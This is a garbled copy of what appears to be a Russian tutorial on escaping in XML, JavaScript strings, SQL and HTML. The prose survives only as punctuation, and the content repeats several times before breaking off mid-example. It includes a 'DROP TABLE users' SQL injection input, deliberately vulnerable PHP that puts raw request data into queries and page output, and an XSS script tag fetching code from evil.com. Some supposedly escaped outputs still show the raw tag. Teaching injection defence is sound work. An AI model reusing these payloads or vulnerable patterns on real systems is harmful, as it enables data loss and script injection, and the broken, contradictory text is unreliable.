, . "<" "&lt;", ">" - "&gt;".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
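<!-- Output encoding for HTML text content: htmlspecialchars() turns <, >, &, " (and with ENT_QUOTES also ') into
     entities. Flags and charset are passed explicitly: before PHP 8.1 the default flags did not encode single quotes,
     and ENT_SUBSTITUTE keeps an invalid UTF-8 byte sequence from turning the whole output into an empty string.
     This is the right encoding for element text only - attribute values, URLs and inline JavaScript each need
     their own context-specific encoding. -->
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); ?> </p> </div>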
htmlspecialchars
, , . :
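<!-- Rendered output after htmlspecialchars(): every <, > and " in the post became an entity, so the browser displays
     the literal text of the script tag and fetches and executes nothing. -->
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>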
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
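// Prepared statement: the SQL text and the value travel separately, so the value is never parsed as SQL.
// PDOStatement::execute() takes an ARRAY of parameters, one per "?" placeholder - passing the raw string
// (as the original did) is a bug. This protects value positions only; table/column names or sort directions
// cannot be parameterized and need an allow-list instead.
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?');
$stmt->execute([$_POST['name']]);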
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
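<?xml version="1.0" encoding="UTF-8" ?>
<!-- Escaped form of the previous example: inside text content "<" must be written as &lt;
     (and ">" conventionally as &gt;), otherwise the parser treats "< n" as the start of a tag
     and rejects the document. -->
<article>
  <author>Homo Sapiens</author>
  <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents>
</article>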
, . "<" "&lt;", ">" - "&gt;".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
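<!-- Output encoding for HTML text content: htmlspecialchars() turns <, >, &, " (and with ENT_QUOTES also ') into
     entities. Flags and charset are passed explicitly: before PHP 8.1 the default flags did not encode single quotes,
     and ENT_SUBSTITUTE keeps an invalid UTF-8 byte sequence from turning the whole output into an empty string.
     This is the right encoding for element text only - attribute values, URLs and inline JavaScript each need
     their own context-specific encoding. -->
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); ?> </p> </div>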
htmlspecialchars
, , . :
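<!-- Rendered output after htmlspecialchars(): every <, > and " in the post became an entity, so the browser displays
     the literal text of the script tag and fetches and executes nothing. -->
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>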
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
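// Prepared statement: the SQL text and the value travel separately, so the value is never parsed as SQL.
// PDOStatement::execute() takes an ARRAY of parameters, one per "?" placeholder - passing the raw string
// (as the original did) is a bug. This protects value positions only; table/column names or sort directions
// cannot be parameterized and need an allow-list instead.
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?');
$stmt->execute([$_POST['name']]);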
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
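<?xml version="1.0" encoding="UTF-8" ?>
<!-- Escaped form of the previous example: inside text content "<" must be written as &lt;
     (and ">" conventionally as &gt;), otherwise the parser treats "< n" as the start of a tag
     and rejects the document. -->
<article>
  <author>Homo Sapiens</author>
  <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents>
</article>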
, . "<" "&lt;", ">" - "&gt;".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
// Intentionally vulnerable example from the text: the request value is interpolated into
// the SQL string with no escaping and no parameter binding, so a quote in the input ends
// the string literal and the rest is parsed as SQL (the DROP TABLE example below shows this).
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<?php // Intentionally vulnerable example from the text: $post['username'] and $post['body'] are echoed without HTML escaping, so markup stored in a post is rendered by the browser instead of being shown as text (the script-tag example below). ?>
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
// Escaping before interpolation: mysql_real_escape_string() backslash-escapes the quote,
// so the input stays inside the string literal (see the escaped queries below).
// Caveats: the mysql_* extension is deprecated and was removed in PHP 7; the escape only
// protects a value that is quoted in the query, and it relies on the connection charset
// matching the data. The prepared-statement form shown later is the preferred fix.
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<?php // Output encoding: htmlspecialchars() converts &, <, > and double quotes to entities, so post content is shown as text rather than parsed as markup. Single quotes are converted only with ENT_QUOTES on PHP versions before 8.1, so pass ENT_QUOTES and the charset explicitly, e.g. htmlspecialchars($s, ENT_QUOTES, 'UTF-8'), if the value is ever placed inside an attribute. ?>
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
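// Prepared statement: the query text is sent with a placeholder and the user-supplied
// value is bound separately, so it is never parsed as SQL. PDOStatement::execute() takes
// an array with one entry per placeholder; the original passed the bare string, which
// PHP 8 rejects with a TypeError.
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute([$_POST['name']]);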
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
// Intentionally vulnerable example from the text: the request value is interpolated into
// the SQL string with no escaping and no parameter binding, so a quote in the input ends
// the string literal and the rest is parsed as SQL (the DROP TABLE example below shows this).
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<?php // Intentionally vulnerable example from the text: $post['username'] and $post['body'] are echoed without HTML escaping, so markup stored in a post is rendered by the browser instead of being shown as text (the script-tag example below). ?>
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
// Escaping before interpolation: mysql_real_escape_string() backslash-escapes the quote,
// so the input stays inside the string literal (see the escaped queries below).
// Caveats: the mysql_* extension is deprecated and was removed in PHP 7; the escape only
// protects a value that is quoted in the query, and it relies on the connection charset
// matching the data. The prepared-statement form shown later is the preferred fix.
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<?php // Output encoding: htmlspecialchars() converts &, <, > and double quotes to entities, so post content is shown as text rather than parsed as markup. Single quotes are converted only with ENT_QUOTES on PHP versions before 8.1, so pass ENT_QUOTES and the charset explicitly, e.g. htmlspecialchars($s, ENT_QUOTES, 'UTF-8'), if the value is ever placed inside an attribute. ?>
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
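// Prepared statement: the query text is sent with a placeholder and the user-supplied
// value is bound separately, so it is never parsed as SQL. PDOStatement::execute() takes
// an array with one entry per placeholder; the original passed the bare string, which
// PHP 8 rejects with a TypeError.
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute([$_POST['name']]);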
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
// Intentionally vulnerable example from the text: the request value is interpolated into
// the SQL string with no escaping and no parameter binding, so a quote in the input ends
// the string literal and the rest is parsed as SQL (the DROP TABLE example below shows this).
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<?php // Intentionally vulnerable example from the text: $post['username'] and $post['body'] are echoed without HTML escaping, so markup stored in a post is rendered by the browser instead of being shown as text (the script-tag example below). ?>
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
// Escaping before interpolation: mysql_real_escape_string() backslash-escapes the quote,
// so the input stays inside the string literal (see the escaped queries below).
// Caveats: the mysql_* extension is deprecated and was removed in PHP 7; the escape only
// protects a value that is quoted in the query, and it relies on the connection charset
// matching the data. The prepared-statement form shown later is the preferred fix.
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<?php // Output encoding: htmlspecialchars() converts &, <, > and double quotes to entities, so post content is shown as text rather than parsed as markup. Single quotes are converted only with ENT_QUOTES on PHP versions before 8.1, so pass ENT_QUOTES and the charset explicitly, e.g. htmlspecialchars($s, ENT_QUOTES, 'UTF-8'), if the value is ever placed inside an attribute. ?>
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
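// Prepared statement: the query text is sent with a placeholder and the user-supplied
// value is bound separately, so it is never parsed as SQL. PDOStatement::execute() takes
// an array with one entry per placeholder; the original passed the bare string, which
// PHP 8 rejects with a TypeError.
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute([$_POST['name']]);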
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
// Intentionally vulnerable example from the text: the request value is interpolated into
// the SQL string with no escaping and no parameter binding, so a quote in the input ends
// the string literal and the rest is parsed as SQL (the DROP TABLE example below shows this).
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<?php // Intentionally vulnerable example from the text: $post['username'] and $post['body'] are echoed without HTML escaping, so markup stored in a post is rendered by the browser instead of being shown as text (the script-tag example below). ?>
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
// Escaping before interpolation: mysql_real_escape_string() backslash-escapes the quote,
// so the input stays inside the string literal (see the escaped queries below).
// Caveats: the mysql_* extension is deprecated and was removed in PHP 7; the escape only
// protects a value that is quoted in the query, and it relies on the connection charset
// matching the data. The prepared-statement form shown later is the preferred fix.
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
